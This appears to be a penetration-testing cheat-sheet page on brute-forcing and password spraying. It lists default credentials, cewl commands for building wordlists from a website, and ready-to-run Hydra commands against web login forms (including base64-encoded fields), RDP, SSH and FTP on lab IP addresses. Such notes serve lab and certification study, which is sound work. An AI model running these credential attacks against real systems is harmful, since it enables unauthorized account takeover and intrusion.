Brute Forcing and Spraying

Common Usernames

root
admin
administrator

Common Passwords

admin
root
toor
password
Username:Username     <--- upercase first letter
username:username     <--- lowercase first letter
AppName:AppName       <--- Test upper and lower

Scrape website for potential passwords

cewl <url>
cewl --lower <url>
cewl --upper <url>

Test uppercase and lowercase

Hydra

Login Portals

Example 1

  • Capture in Burp

  • Username and Password converted to base64 upon sending

  • Error code 403 = failed

hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

hydra -I -vV -f -L users.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

  • I - ignore restore files

  • vV - verbose mode

  • f - stop upon success

  • L - username list

  • P - password list

  • ^USER64^ ^PASS64^ - placements for username and password + base64 encode

  • C=/ - establish session cookies at the URL

  • F=403 - HTTP 403 means invalid login

Example 2

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 
http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
hydra -l admin -P ~/rockyou.txt http-get://192.168.178.201 -vV

Other services

hydra -vV -L names.txt -p 'SuperS3cure1337#' 192.168.178.202 rdp -t 10
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ssh
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ftp
PreviousSource CodeNextPayloads

Last updated